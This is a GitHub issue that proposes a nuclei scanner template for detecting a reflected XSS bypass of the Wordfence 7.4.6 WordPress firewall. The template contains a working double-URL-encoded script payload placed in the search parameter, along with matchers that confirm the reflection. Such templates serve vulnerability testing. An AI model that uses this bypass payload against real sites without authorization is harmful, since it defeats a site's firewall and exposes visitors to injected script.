### ISSUE TITLE
wordpress-wordfence-waf-xss-bypass

### ISSUE THREAD

**Issue by shifa123** [projectdiscovery/nuclei-templates#1296]
One of the double encoded payload which works for wordpress-wordfence-waf-xss-bypass

```yaml

--- 
id: Wordpress-wordfence-waf-bypass-xss
info: 
  author: hackergautam
  name: "Wordfence 7.4.6 Cross Site Scripting WAF Bypass"
  reference: "https://twitter.com/naglinagli/status/1382082473744564226"
  severity: medium
  tags: "wordpress,wordfence,xss"
requests: 
  - 
    matchers: 
      - 
        part: body
        type: word
        words: 
          - <script>alert(document.domain)</script>
      - 
        part: header
        type: word
        words: 
          - text/html
    matchers-condition: and
    method: GET
    path: 
      - "{{BaseURL}}/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6"

```
